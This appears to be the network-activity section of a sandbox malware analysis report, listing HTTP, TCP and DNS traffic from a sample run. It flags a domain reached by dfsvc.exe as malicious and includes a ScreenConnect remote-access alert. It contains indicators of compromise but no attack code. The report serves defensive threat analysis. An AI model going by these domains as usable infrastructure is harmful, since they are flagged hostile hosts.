Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
22
DNS requests
12
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.145:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6028
dfsvc.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D
unknown
whitelisted
6028
dfsvc.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6028
dfsvc.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D
unknown
whitelisted
7892
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7892
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
23.48.23.145:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6028
dfsvc.exe
104.21.80.1:8443
texz.jhpublicaffairs.ie
CLOUDFLARENET
unknown
6028
dfsvc.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
6544
svchost.exe
20.190.159.0:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.145
  • 23.48.23.148
  • 23.48.23.155
  • 23.48.23.146
  • 23.48.23.139
  • 23.48.23.140
  • 23.48.23.157
  • 23.48.23.147
  • 23.48.23.149
whitelisted
google.com
  • 142.250.185.174
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
texz.jhpublicaffairs.ie
  • 104.21.80.1
  • 104.21.16.1
  • 104.21.32.1
  • 104.21.112.1
  • 104.21.48.1
  • 104.21.64.1
  • 104.21.96.1
malicious
ocsp.digicert.com
  • 2.17.190.73
whitelisted
login.live.com
  • 20.190.159.0
  • 40.126.31.0
  • 40.126.31.129
  • 40.126.31.1
  • 20.190.159.128
  • 20.190.159.73
  • 40.126.31.2
  • 20.190.159.2
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 40.69.42.241
whitelisted
info.seac0cruree-den0ee-reei9-90.su
  • 45.133.74.85
unknown

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
REMOTE [ANY.RUN] ScreenConnect Server Response
No debug info